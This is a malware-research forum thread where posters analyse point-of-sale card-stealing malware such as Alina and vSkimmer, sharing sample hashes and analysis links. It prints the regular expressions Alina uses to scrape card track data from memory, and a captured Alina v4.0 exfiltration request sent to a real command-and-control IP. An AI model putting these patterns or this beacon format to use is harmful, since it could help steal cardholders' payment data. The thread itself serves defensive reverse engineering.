[blake]

An analysis of alina here:
http://myexperimentswithmalware.blogspo ... chive.html

Buster/strobo,
The purpose of Alina is to monitor for credit card information.
As evidence review this:
((%?[Bb|`]?)[0-9]{13,19}\^[A-Za-z\s]{0,26}/[A-Za-z\s]{0,26}\^(1[2-9])(0[1-9]|1[0-2])[0-9\s]{3,50}\?)
([0-9]{13,19}=(1[2-9])(0[1-9]|1[0-2])[0-9]{3,50}\?)
(((%?[Bb|`]?)[0-9]{13,19}\^[A-Za-z\s]{0,26}/[A-Za-z\s]{0,26}\^(1[2-9])(0[1-9]|1[0-2])[0-9\s]{3,50}\?)[;\s]{1,3}([0-9]{13,19}=(1[2-9])(0[1-9]|1[0-2])[0-9]{3,50}\?))

and this:
http://www.xylibox.com/2012/10/how-i-carded-myself.html

[Xylitol]

Symantec discovered Alina :)) http://www.symantec.com/security_respon ... 12-1503-99
And about Alina... seem the v4.0 is out.
https://www.virustotal.com/file/102fa9c ... 360615660/

Code: Select all

POST /e107/login.php HTTP/1.1
Accept: text/*, application/octet-stream
Content-Type: application/x-www-form-urlencoded
User-Agent: Alina v4.0
Host: 193.169.87.147
Content-Length: 360
Cache-Control: no-cache
act=l&b=1140f588&c=pc0&v=v4.0&p=C:\102fa9c066.exe&ldata=f0c2c5d8dfcac7c7c8c3cec8c0919a9c928b979b95f68be2c5d8dfcac7c7cecf8bdfc48be891f7efc4c8dec6cec5dfd88bcac5cf8bf8cedfdfc2c5ccd8f7eacfc6c2c5c2d8dfd9cadfc4d9f7eadbdbc7c2c8cadfc2c4c58befcadfcaf7c1caddca85ced3ce878bd8dfcad9dfcecf8bc5cedc8bdbd9c4c8ced8d88bdcc2dfc38bcac7c2c5ca96e891f79a9b99cdca92c89b9d9d85ced3cea1HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Mon, 11 Feb 2013 20:49:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.7

1f
No admin password record found.
0

Edit: both paths and answers on 193.169.87.147 and 208.98.63.228... proxies or just a synchro ?!

[Xylitol]

Win32/Spy.POSCardStealer.A:
https://www.virustotal.com/file/af35e64 ... 360596995/
https://www.virustotal.com/file/180ed8d ... 360596997/
i don't know the password for these, refere here: http://www.xylibox.com/2013/02/youre-va ... arder.html

Two files from https://www.trustwave.com/downloads/spi ... e_2010.pdf
https://www.virustotal.com/fr/file/b5c5 ... 360922618/
https://www.virustotal.com/fr/file/b532 ... 360922618/
Unfortunately cant find ramsys32.sys
AV seem don't know thems and i've mailed trustwave but they can't share sample.
Bad, because that seem very interesting.

And card recon:
https://www.virustotal.com/fr/file/ce44 ... 360923042/
i hope AV will wake up and flag all that as unwanted/malware

[bsteo]

Card Recon is legit software, I disagree with you, can't cast out a piece of software only because is used by the bad guys :)

[Xylitol]

well, just flag it as hacktool, and it's a 'cracked' version so... i don't think the guys who publish it will whine if av detect it.
see Nirsoft password tools ? same shit legit but used by bad guys, good that av detect it.

[Xylitol]

vSkimmer in attach.
https://www.virustotal.com/fr/file/b951 ... 361414885/

[Xylitol]

Alina 3.3
https://www.virustotal.com/en/file/6a44 ... 361454726/

[bobodoc]

exitthematrix,

Is the encryption key stored 16 bytes before the Run key's name in the iexplore.exe memory (dump)?

Depends on sample, just looked at "cae3cdaaa1ec224843e1c3efb78505b2e0781d70502bedff5715dc0e9b561785" dump and the KEY is located 8 bytes before the MUTEX name.

BTW, got anybody the PHP panel?

Anyway, I wrote a shitty but half-functional "gateway.php" to fully find out how the bot is functioning (everything work besides the commands, I didn't test them). PM if need the script.

I can't pm you, but can you pm with a contact id ?

[bsteo]

For what? If you think I'm a POS malware bad guys helper you're wrong. Don't get me wrong, but your first post here is about how to send me PM to give you some script. I fight malware.

[EP_X0FF]

I can't pm you, but can you pm with a contact id ?

Users with low or zero count of posts cannot use PM.

This board was built on principles of sharing knowledge, not playing in spy games.

We do not create malware here, do not support malware and do not consult how to use it for your own needs.

This particular subforum focuses on reversing, tracking and identifying different malware with open discussion and samples free for download for every registered member. Registration is also free as you already know.

If you have specific question -> post it and show what you already have done, maybe somebody can help you. Otherwise -> go away.